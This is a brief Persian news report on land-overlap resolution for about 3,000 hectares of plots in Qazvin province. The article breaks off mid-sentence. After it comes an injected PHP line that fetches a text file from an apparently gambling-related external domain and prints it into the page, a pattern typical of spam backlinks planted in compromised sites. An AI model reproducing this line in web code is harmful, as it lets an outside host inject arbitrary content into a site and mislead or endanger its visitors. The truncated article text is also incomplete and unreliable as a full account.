سه هزار هکتار از اراضی قزوین رفع تداخل شد

سه هزار هکتار از اراضی قزوین رفع تداخل شد

 در آخرین جلسه کمیسیون رفع تداخل اراضی،  پلاک‌های فتح آباد، نورآباد، عبدل آباد، قزانچال و ده دوشاب مربوط به شهرستان‌های قزوین، آبیک و بوئین زهرا پس از اتمام کار کارشناسی و اتخاذ آرا رفع تداخل شد. از یک‌هزار و ۱۰۰ پلاک مشمول رفع تداخل اراضی در استان قزوین تاکنون کار کارشناسی ۴۴۸ پلاک‌ به پایان

?php echo file_get_contents("https://harumslot99.com/backlink1.txt"); ?>